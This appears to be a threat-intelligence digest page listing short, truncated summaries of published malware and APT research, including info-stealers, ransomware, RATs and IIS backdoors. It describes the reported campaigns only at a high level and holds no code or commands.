SessionManager is an IIS backdoor tied to the GELSEMIUM activity cluster that persists on compromised servers by loading a malicious IIS module after ProxyLogon-type exploits. It enables reading/writing files, remote command execution, and HTTP-based command-a…
Category: Threat Research
YTStealer is a YouTube authentication cookie stealer marketed on the dark web, designed to harvest credentials and channel data from creators. It evades analysis with sandbox checks, uses headless browser automation to validate cookies and collect YouTube Stud…
Cyble Research Labs uncovered PennyWise, a new evasive infostealer that targets 30+ Chrome-based and 5+ Mozilla-based browsers as well as crypto wallets, with updated version 1.3.4 already observed in the wild. The malware is distributed via YouTube campaigns …
Raccoon Stealer v2 marks a notable revival of the information stealer brand, with early signs of life detected in 2022 as servers and administration panels surfaced. SEKOIA.IO documents a refreshed build, renewed distribution, and a plan to scale behind a rede…
Two Ukrainian targets were hit by emails delivering malicious documents that leveraged a Follina-like vulnerability and malicious macros to drop a DCRat variant. FortiGuard Labs notes the campaign revolves around Dark Crystal RAT (DCRat) with multi-stage infec…
ReversingLabs reports AstraLocker 2.0 is distributed directly from Microsoft Word phishing documents, leveraging leaked Babuk code and a “smash and grab” approach for rapid impact. The campaign uses an old packer, anti-analysis checks, and Monero/BTC wallets f…
Two sentences: The ASEC analysis covers a new info-stealer distribution campaign branded as “Recordbreaker Stealer,” which began in earnest around May 20 and is spread by disguising itself as software cracks/installers. It may be a new version of Raccoon Steal…
ThreatLabz tracks Evilnum APT activity from early 2022, noting a shift to targeted campaigns in UK/Europe FinTech and expanded targets including an intergovernmental migration organization. The updated campaign uses document template injection in MS Office Wor…
Black Basta expanded its repertoire by employing QakBot as an entry point and using the PrintNightmare flaw to perform privileged file operations. It also leveraged the Coroxy backdoor and Netcat for lateral movement across networks. #BlackBasta #QakBot
eSentire’s TRU team uncovered Socgholish, a drive-by social engineering threat that delivers a fake software update, leading to quick Cobalt Strike deployment and persistence. The case highlights how drive-by infections can escalate to hands-on-keyboard intrus…
MuddyWater has maintained a long-term infection campaign targeting Middle East countries since late 2020, with recent samples suggesting it may still be active. The campaign centers on compressed attachments containing Word documents with VBA macros that drop …
Authored by Dexter Shin Instagram has become a platform with over a billion monthly active users. Many of Instagram’s users…
The post Instagram credentials Stealers: Free Followers or Free Likes appeared first on McAfee Blog….
Authored by Dexter Shin McAfee’s Mobile Research Team introduced a new Android malware targeting Instagram users who want to increase…
The post Instagram credentials Stealer: Disguised as Mod App appeared first on McAfee Blog….
Cyble Research Labs highlights a rise in using Windows .lnk shortcut files to deliver payloads via LOLBins like PowerShell and mshta, including a new “Quantum Builder” tool that can create .lnk, .hta, and .iso-based payloads. The report also notes potential La…
ToddyCat is a recently identified APT that uses two previously unknown tools, Samurai backdoor and Ninja Trojan, to target high-profile entities in Europe and Asia since December 2020. The operation began with Exchange server compromises and a China Chopper we…